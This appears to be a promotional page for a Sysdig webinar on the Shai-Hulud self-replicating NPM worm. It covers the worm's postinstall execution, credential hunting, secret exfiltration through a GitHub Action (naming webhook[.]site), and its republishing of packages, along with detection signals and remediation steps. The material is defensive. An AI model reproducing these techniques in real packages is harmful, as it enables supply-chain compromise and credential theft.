Shai-Hulud: The self-replicating NPM worm
How it works, why it matters, and how to defend

Shai-Hulud: The self-replicating NPM worm
During September 2025, researchers observed a supply-chain campaign in the NPM ecosystem using self-replicating malware to spread across maintainers’ packages. After executing during postinstall, the worm conducts local discovery, hunts for GitHub/NPM/cloud credentials, drops a malicious GitHub Action to exfiltrate secrets (often via webhook[.]site), and republishes infected versions of all packages owned by a compromised maintainer — accelerating propagation to hundreds of packages.
What You’ll takeaway:
- How Shai-Hulud works — post-install execution (bundle.js), local discovery, credential theft, GitHub Action persistence, and automated NPM republishing.
- Why it’s a big deal — novel self-propagation within the NPM ecosystem; rapid spread to ~200 packages in the first 24 hours.
- How to detect it — runtime signals (e.g., suspicious bundle.js activity, trufflehog execution, outbound calls during install, unusual public repo creation) and detections available in Sysdig Secure and Falco.
- What to do now — inventory checks for affected packages, version pinning/rollback, credential rotation, blocking npm where needed, and GitHub hygiene.
Speakers:
- Alberto Pellitteri — Sysdig Threat Research
- Michael Clark — Sysdig Threat Research
